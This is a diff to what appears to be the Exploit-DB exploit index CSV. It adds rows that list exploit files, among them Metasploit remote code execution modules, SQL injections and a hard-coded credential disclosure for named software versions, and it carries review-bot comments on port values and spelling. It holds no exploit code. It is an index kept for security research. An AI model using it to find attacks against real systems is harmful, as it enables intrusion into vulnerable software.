@ -38743,6 +38746,7 @@ id,file,description,date,author,type,platform,port
42971,exploits/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
42975,exploits/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",webapps,linux,
44274,exploits/java/webapps/44274.rb,"ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)",2018-03-12,"Mehmet Ince",webapps,java,
42978,exploits/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",webapps,php,
42979,exploits/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' SQL Injection",2017-10-12,"Guilherme Assmann",webapps,php,
42980,exploits/php/webapps/42980.txt,"E-Sic Software livre CMS - Autentication Bypass",2017-10-12,"Elber Tavares",webapps,php,
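Review bot: the `44274` row has an empty `port` column while the module sets `'RPORT' => 9090` as its default; record `9090` here for consistency with other Metasploit rows that carry their default port.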
@ -38973,6 +38977,7 @@ id,file,description,date,author,type,platform,port
44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
44185,exploits/php/webapps/44185.txt,"Schools Alert Management Script 2.0.2 - Authentication Bypass",2018-02-27,"Prasenjit Kanti Paul",webapps,php,
44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,
44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
@ -38987,3 +38992,6 @@ id,file,description,date,author,type,platform,port
44261,exploits/php/webapps/44261.txt,"Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection",2018-03-07,h0n1gsp3cht,webapps,php,80
44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000
44272,exploits/php/webapps/44272.txt,"Bacula-Web < 8.0.0-rc2 - SQL Injection",2018-03-09,"Gustavo Sorondo",webapps,php,
44277,exploits/php/webapps/44277.txt,"TextPattern 4.6.2 - 'qty' SQL Injection",2018-03-12,"Manuel García Cárdenas",webapps,php,
44278,exploits/windows/webapps/44278.py,"Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution",2018-03-12,"Chris Lyne",webapps,windows,
44281,exploits/windows/webapps/44281.txt,"ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution",2018-03-12,Clutchisback1,webapps,windows,
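Review bot: the `44277` row writes the product as `TextPattern` while the advisory (section I) and the project use `Textpattern`; use the project's spelling. The `44281` row describes the ACL Analytics entry only as `Arbitrary Code Execution`, which matches the file's `Exploit Title` but says nothing about the vector; once the file documents it, the description here should name it too.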
